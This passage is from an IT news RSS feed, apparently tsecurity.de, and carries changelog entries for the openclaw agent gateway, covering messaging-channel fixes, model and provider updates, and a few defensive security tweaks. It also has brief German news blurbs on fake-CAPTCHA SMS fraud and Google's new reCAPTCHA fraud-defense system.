<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie SMS-Abzocke per CAPTCHA Handykosten explodieren lässt]]></title>
<description><![CDATA[Kriminelle nutzen gefälschte Captchas um Nutzer zum Senden teurer Auslands SMS zu verleiten. Das Ergebnis sind hohe Gebühren durch Telefonbetrug weltweit.

Tags: #CAPTCHAs | #Cyber Crime | #SMS]]></description>
<link>https://tsecurity.de/de/3481596/it-security-nachrichten/wie-sms-abzocke-per-captcha-handykosten-explodieren-laesst/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3481596/it-security-nachrichten/wie-sms-abzocke-per-captcha-handykosten-explodieren-laesst/</guid>
<pubDate>Sat, 02 May 2026 05:35:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920.jpg" class="attachment-full size-full wp-post-image" alt="Google, recaptcha fake, fake recaptcha site, recaptcha missbrauch, recaptcha gefälscht, reCAPTCHA, Fake" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Wie SMS-Abzocke per CAPTCHA Handykosten explodieren lässt 1"></p>
    Kriminelle nutzen gefälschte Captchas um Nutzer zum Senden teurer Auslands SMS zu verleiten. Das Ergebnis sind hohe Gebühren durch Telefonbetrug weltweit.

<p>Tags: <a href="https://www.it-daily.net/thema/captchas">#CAPTCHAs</a> | <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/sms">#SMS</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alternative zu nervigen Bilderrätseln: Google stellt neues Captcha-System vor]]></title>
<description><![CDATA[Google entwickelt reCAPTCHA zum Fraud-Defense-System weiter. Die Plattform soll künftig Menschen, Bots und KI-Agenten unterscheiden und Online-Betrug ausbremsen.]]></description>
<link>https://tsecurity.de/de/3473322/downloads/alternative-zu-nervigen-bilderraetseln-google-stellt-neues-captcha-system-vor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473322/downloads/alternative-zu-nervigen-bilderraetseln-google-stellt-neues-captcha-system-vor/</guid>
<pubDate>Wed, 29 Apr 2026 07:45:50 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img align="right" alt="" width="60" height="34" src="https://quadro.burda-forward.de/ctf/9a0a23c4-c67d-48a6-b547-16cc6c9acdf7.e795cd41-f0ac-4278-b6f4-96dc50862ac5.jpg?im=AspectCrop%2Csize%3D%2830%2C+17%29%2Cgravity%3DCenter%2CallowExpansion%3BResize%3D%2860%2C+34%29%2Caspect%3Dfit%3BBackgroundColor%2Ccolor%3Dffffff&amp;impolicy=chip&amp;hash=3e0c5c79cec7212bbcdf07e6b3889159699b862ad8e322c714bb01278cb35638"> Google entwickelt reCAPTCHA zum Fraud-Defense-System weiter. Die Plattform soll künftig Menschen, Bots und KI-Agenten unterscheiden und Online-Betrug ausbremsen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Alternative zu nervigen Bilderrätseln: Google stellt neues Captcha-System vor]]></title>
<description><![CDATA[Google entwickelt reCAPTCHA zum Fraud-Defense-System weiter. Die Plattform soll künftig Menschen, Bots und KI-Agenten unterscheiden und Online-Betrug ausbremsen.]]></description>
<link>https://tsecurity.de/de/3470106/downloads/alternative-zu-nervigen-bilderraetseln-google-stellt-neues-captcha-system-vor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3470106/downloads/alternative-zu-nervigen-bilderraetseln-google-stellt-neues-captcha-system-vor/</guid>
<pubDate>Tue, 28 Apr 2026 08:16:11 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img align="right" alt="" width="60" height="34" src="https://quadro.burda-forward.de/ctf/9a0a23c4-c67d-48a6-b547-16cc6c9acdf7.e795cd41-f0ac-4278-b6f4-96dc50862ac5.jpg?im=AspectCrop%2Csize%3D%2830%2C+17%29%2Cgravity%3DCenter%2CallowExpansion%3BResize%3D%2860%2C+34%29%2Caspect%3Dfit%3BBackgroundColor%2Ccolor%3Dffffff&amp;impolicy=chip&amp;hash=3e0c5c79cec7212bbcdf07e6b3889159699b862ad8e322c714bb01278cb35638"> Google entwickelt reCAPTCHA zum Fraud-Defense-System weiter. Die Plattform soll künftig Menschen, Bots und KI-Agenten unterscheiden und Online-Betrug ausbremsen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Statt Bilderrätsel: Google führt QR-Code-Challenge gegen KI-Bots ein]]></title>
<description><![CDATA[Google erweitert reCAPTCHA zu „Cloud Fraud Defense“, einer Plattform gegen Betrug und Missbrauch, die auch KI-Agenten erkennt.]]></description>
<link>https://tsecurity.de/de/3468336/it-security-nachrichten/statt-bilderraetsel-google-fuehrt-qr-code-challenge-gegen-ki-bots-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468336/it-security-nachrichten/statt-bilderraetsel-google-fuehrt-qr-code-challenge-gegen-ki-bots-ein/</guid>
<pubDate>Mon, 27 Apr 2026 15:52:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google erweitert reCAPTCHA zu „Cloud Fraud Defense“, einer Plattform gegen Betrug und Missbrauch, die auch KI-Agenten erkennt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Statt Bilderrätsel: Google führt QR-Code-Challenge gegen KI-Bots ein]]></title>
<description><![CDATA[Google erweitert reCAPTCHA zu „Cloud Fraud Defense“, einer Plattform gegen Betrug und Missbrauch, die auch KI-Agenten erkennt.]]></description>
<link>https://tsecurity.de/de/3468330/it-nachrichten/statt-bilderraetsel-google-fuehrt-qr-code-challenge-gegen-ki-bots-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468330/it-nachrichten/statt-bilderraetsel-google-fuehrt-qr-code-challenge-gegen-ki-bots-ein/</guid>
<pubDate>Mon, 27 Apr 2026 15:46:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google erweitert reCAPTCHA zu „Cloud Fraud Defense“, einer Plattform gegen Betrug und Missbrauch, die auch KI-Agenten erkennt.]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3461974/downloads/openclaw-2026423/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461974/downloads/openclaw-2026423/</guid>
<pubDate>Fri, 24 Apr 2026 17:31:04 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
